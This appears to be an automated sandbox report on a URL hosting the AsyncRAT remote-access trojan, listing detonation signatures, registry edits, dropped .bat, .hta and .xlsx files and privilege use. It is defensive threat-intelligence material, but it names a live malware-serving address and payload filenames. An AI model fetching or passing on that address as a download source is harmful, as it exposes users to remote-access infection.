Malware Analysis Report

2025-01-02 12:09

Sample ID 240419-teaamagd79
Target http://193.222.96.128:7287/
Tags
asyncrat default rat
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

Threat Level: Known bad

The file http://193.222.96.128:7287/ was found to be: Known bad.

Malicious Activity Summary

asyncrat default rat

AsyncRat

Async RAT payload

Blocklisted process makes network request

Checks computer location settings

Enumerates physical storage devices

Suspicious behavior: EnumeratesProcesses

Suspicious use of FindShellTrayWindow

Opens file in notepad (likely ransom note)

Suspicious use of WriteProcessMemory

Checks processor information in registry

Suspicious use of AdjustPrivilegeToken

Suspicious use of SetWindowsHookEx

Suspicious use of SendNotifyMessage

Modifies registry class

NTFS ADS

Suspicious behavior: GetForegroundWindowSpam

Uses Task Scheduler COM API

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-04-19 15:57

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-04-19 15:57

Reported

2024-04-19 16:03

Platform

win10v2004-20240412-en

Max time kernel

300s

Max time network

304s

Command Line

"C:\Program Files\Mozilla Firefox\firefox.exe" -osint -url "http://193.222.96.128:7287/"

Signatures

AsyncRat

rat asyncrat

Async RAT payload

rat
Description Indicator Process Target
N/A N/A N/A N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-2288054676-1871194608-3559553667-1000\Control Panel\International\Geo\Nation C:\Windows\SysWOW64\mshta.exe N/A

Enumerates physical storage devices

Checks processor information in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Program Files\Mozilla Firefox\firefox.exe N/A

Modifies registry class

Description Indicator Process Target
Set value (data) \REGISTRY\USER\S-1-5-21-2288054676-1871194608-3559553667-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0 = 14002e803accbfb42cdb4c42b0297fe99a87c6410000 C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2288054676-1871194608-3559553667-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2288054676-1871194608-3559553667-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg C:\Program Files\Mozilla Firefox\firefox.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2288054676-1871194608-3559553667-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1092616257" C:\Program Files\Mozilla Firefox\firefox.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2288054676-1871194608-3559553667-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots C:\Program Files\Mozilla Firefox\firefox.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2288054676-1871194608-3559553667-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\1\MRUListEx = ffffffff C:\Program Files\Mozilla Firefox\firefox.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2288054676-1871194608-3559553667-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\IconSize = "16" C:\Program Files\Mozilla Firefox\firefox.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2288054676-1871194608-3559553667-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\Mode = "4" C:\Program Files\Mozilla Firefox\firefox.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2288054676-1871194608-3559553667-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\GroupView = "4294967295" C:\Program Files\Mozilla Firefox\firefox.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2288054676-1871194608-3559553667-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\FFlags = "1" C:\Program Files\Mozilla Firefox\firefox.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2288054676-1871194608-3559553667-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\1 = 14002e8005398e082303024b98265d99428e115f0000 C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2288054676-1871194608-3559553667-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7} C:\Program Files\Mozilla Firefox\firefox.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2288054676-1871194608-3559553667-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:FMTID = "{00000000-0000-0000-0000-000000000000}" C:\Program Files\Mozilla Firefox\firefox.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2288054676-1871194608-3559553667-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\LogicalViewMode = "1" C:\Program Files\Mozilla Firefox\firefox.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2288054676-1871194608-3559553667-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000009000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000 C:\Program Files\Mozilla Firefox\firefox.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2288054676-1871194608-3559553667-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = ffffffff C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2288054676-1871194608-3559553667-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1 C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2288054676-1871194608-3559553667-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg C:\Program Files\Mozilla Firefox\firefox.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2288054676-1871194608-3559553667-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\Version = "1" C:\Program Files\Mozilla Firefox\firefox.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2288054676-1871194608-3559553667-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\MRUListEx = 00000000ffffffff C:\Program Files\Mozilla Firefox\firefox.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2288054676-1871194608-3559553667-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\MRUListEx = 0100000000000000ffffffff C:\Program Files\Mozilla Firefox\firefox.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2288054676-1871194608-3559553667-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\MRUListEx = 0000000001000000ffffffff C:\Program Files\Mozilla Firefox\firefox.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2288054676-1871194608-3559553667-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Mode = "4" C:\Program Files\Mozilla Firefox\firefox.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2288054676-1871194608-3559553667-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByDirection = "1" C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2288054676-1871194608-3559553667-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\1 C:\Program Files\Mozilla Firefox\firefox.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2288054676-1871194608-3559553667-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\SniffedFolderType = "Downloads" C:\Program Files\Mozilla Firefox\firefox.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2288054676-1871194608-3559553667-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\GroupByDirection = "4294967295" C:\Program Files\Mozilla Firefox\firefox.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2288054676-1871194608-3559553667-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\SniffedFolderType = "Generic" C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\ C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2288054676-1871194608-3559553667-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2 C:\Program Files\Mozilla Firefox\firefox.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2288054676-1871194608-3559553667-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\LogicalViewMode = "1" C:\Program Files\Mozilla Firefox\firefox.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2288054676-1871194608-3559553667-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\IconSize = "16" C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2288054676-1871194608-3559553667-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell C:\Program Files\Mozilla Firefox\firefox.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2288054676-1871194608-3559553667-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0 = 14001f50e04fd020ea3a6910a2d808002b30309d0000 C:\Program Files\Mozilla Firefox\firefox.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2288054676-1871194608-3559553667-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 02 C:\Program Files\Mozilla Firefox\firefox.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2288054676-1871194608-3559553667-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\GroupByKey:FMTID = "{B725F130-47EF-101A-A5F1-02608C9EEBAC}" C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2288054676-1871194608-3559553667-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell C:\Program Files\Mozilla Firefox\firefox.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2288054676-1871194608-3559553667-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\MRUListEx = ffffffff C:\Program Files\Mozilla Firefox\firefox.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2288054676-1871194608-3559553667-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1" C:\Program Files\Mozilla Firefox\firefox.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2288054676-1871194608-3559553667-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\GroupByKey:PID = "14" C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2288054676-1871194608-3559553667-1000_Classes\Local Settings C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2288054676-1871194608-3559553667-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0 C:\Program Files\Mozilla Firefox\firefox.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2288054676-1871194608-3559553667-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\NodeSlot = "1" C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2288054676-1871194608-3559553667-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2288054676-1871194608-3559553667-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\ C:\Program Files\Mozilla Firefox\firefox.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2288054676-1871194608-3559553667-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000009000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000 C:\Program Files\Mozilla Firefox\firefox.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2288054676-1871194608-3559553667-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:PID = "0" C:\Program Files\Mozilla Firefox\firefox.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2288054676-1871194608-3559553667-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\FFlags = "1092616257" C:\Program Files\Mozilla Firefox\firefox.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2288054676-1871194608-3559553667-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0e000000ffffffff C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2288054676-1871194608-3559553667-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU C:\Program Files\Mozilla Firefox\firefox.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2288054676-1871194608-3559553667-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 00000000ffffffff C:\Program Files\Mozilla Firefox\firefox.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2288054676-1871194608-3559553667-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\1\NodeSlot = "2" C:\Program Files\Mozilla Firefox\firefox.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2288054676-1871194608-3559553667-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\KnownFolderDerivedFolderType = "{885A186E-A440-4ADA-812B-DB871B942259}" C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2288054676-1871194608-3559553667-1000_Classes\Local Settings C:\Program Files\Mozilla Firefox\firefox.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2288054676-1871194608-3559553667-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000 C:\Program Files\Mozilla Firefox\firefox.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2288054676-1871194608-3559553667-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupView = "0" C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2288054676-1871194608-3559553667-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0 C:\Program Files\Mozilla Firefox\firefox.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2288054676-1871194608-3559553667-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 0202 C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2288054676-1871194608-3559553667-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259} C:\Program Files\Mozilla Firefox\firefox.exe N/A

NTFS ADS

Description Indicator Process Target
File created C:\Users\Admin\Downloads\15.bat:Zone.Identifier C:\Program Files\Mozilla Firefox\firefox.exe N/A
File created C:\Users\Admin\Downloads\index.hta:Zone.Identifier C:\Program Files\Mozilla Firefox\firefox.exe N/A
File created C:\Users\Admin\Downloads\index(1).hta:Zone.Identifier C:\Program Files\Mozilla Firefox\firefox.exe N/A
File created C:\Users\Admin\Downloads\GoGi.bat:Zone.Identifier C:\Program Files\Mozilla Firefox\firefox.exe N/A
File created C:\Users\Admin\Downloads\jiteon.xlsx:Zone.Identifier C:\Program Files\Mozilla Firefox\firefox.exe N/A

Opens file in notepad (likely ransom note)

ransomware
Description Indicator Process Target
N/A N/A C:\Windows\System32\NOTEPAD.EXE N/A
N/A N/A C:\Windows\SysWOW64\NOTEPAD.EXE N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
Token: SeDebugPrivilege N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
Token: SeDebugPrivilege N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
Token: SeDebugPrivilege N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
Token: SeDebugPrivilege N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
Token: SeDebugPrivilege N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
Token: SeDebugPrivilege N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
Token: SeDebugPrivilege N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
Token: SeDebugPrivilege N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
Token: SeDebugPrivilege N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
Token: SeDebugPrivilege N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
Token: SeDebugPrivilege N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
Token: SeDebugPrivilege N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
Token: SeDebugPrivilege N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
Token: SeDebugPrivilege N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
Token: SeDebugPrivilege N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
Token: SeDebugPrivilege N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
Token: SeDebugPrivilege N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
Token: SeDebugPrivilege N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
Token: SeDebugPrivilege N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
Token: SeDebugPrivilege N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
Token: SeDebugPrivilege N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
Token: SeDebugPrivilege N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
Token: SeDebugPrivilege N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
Token: SeDebugPrivilege N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
Token: SeDebugPrivilege N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
Token: SeDebugPrivilege N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
Token: SeDebugPrivilege N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
Token: SeDebugPrivilege N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
Token: SeDebugPrivilege N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
Token: SeDebugPrivilege N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
Token: SeDebugPrivilege N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
Token: SeDebugPrivilege N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
Token: SeDebugPrivilege N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
Token: SeDebugPrivilege N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
Token: SeDebugPrivilege N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
Token: SeDebugPrivilege N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
Token: SeDebugPrivilege N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
Token: SeDebugPrivilege N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
Token: SeDebugPrivilege N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
Token: SeDebugPrivilege N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
Token: SeDebugPrivilege N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
Token: SeDebugPrivilege N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
Token: SeDebugPrivilege N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
Token: SeDebugPrivilege N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
Token: SeDebugPrivilege N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
Token: SeDebugPrivilege N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
Token: SeDebugPrivilege N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
Token: SeDebugPrivilege N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
Token: SeDebugPrivilege N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
Token: SeDebugPrivilege N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
Token: SeDebugPrivilege N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
